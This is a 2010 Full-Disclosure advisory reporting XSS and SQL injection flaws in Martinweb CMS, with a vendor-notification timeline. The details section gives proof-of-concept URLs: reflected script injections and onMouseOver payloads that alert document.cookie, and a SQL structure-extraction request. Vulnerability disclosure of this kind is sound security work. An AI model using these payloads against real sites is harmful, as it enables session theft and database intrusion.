Martinweb CMS suffers from cross site scripting and remote SQL injection vulnerabilities.
afcc9943d02914a6a3448d1c00d81d75aff5d788554b19a9faeeb6913d8fa909
Hello Full-Disclosure!
I want to warn you about vulnerabilities in Martinweb CMS. It's
Ukrainian commercial CMS (which is used particularly at web sites of
security companies and banks).
-------------------------
Affected products:
-------------------------
Vulnerable are possibly all versions of Martinweb CMS.
----------
Details:
----------
XSS (WASC-08):
http://site/sitesearch/page--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.html
http://site/index.php?pages='&language=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (with MouseOverJacking) (WASC-08):
http://site/index.php?op=search&search='style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'
http://site/index.php?op=search&pages=1'style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'
SQL DB Structure Extraction (WASC-13):
http://site/index.php?pages=
------------
Timeline:
------------
2010.10.11 - announced at my site.
2010.10.12 - informed developers.
2010.10.13 - additionally informed developers (because official e-mail was
forgotten and overfull).
2010.12.22 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4594/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua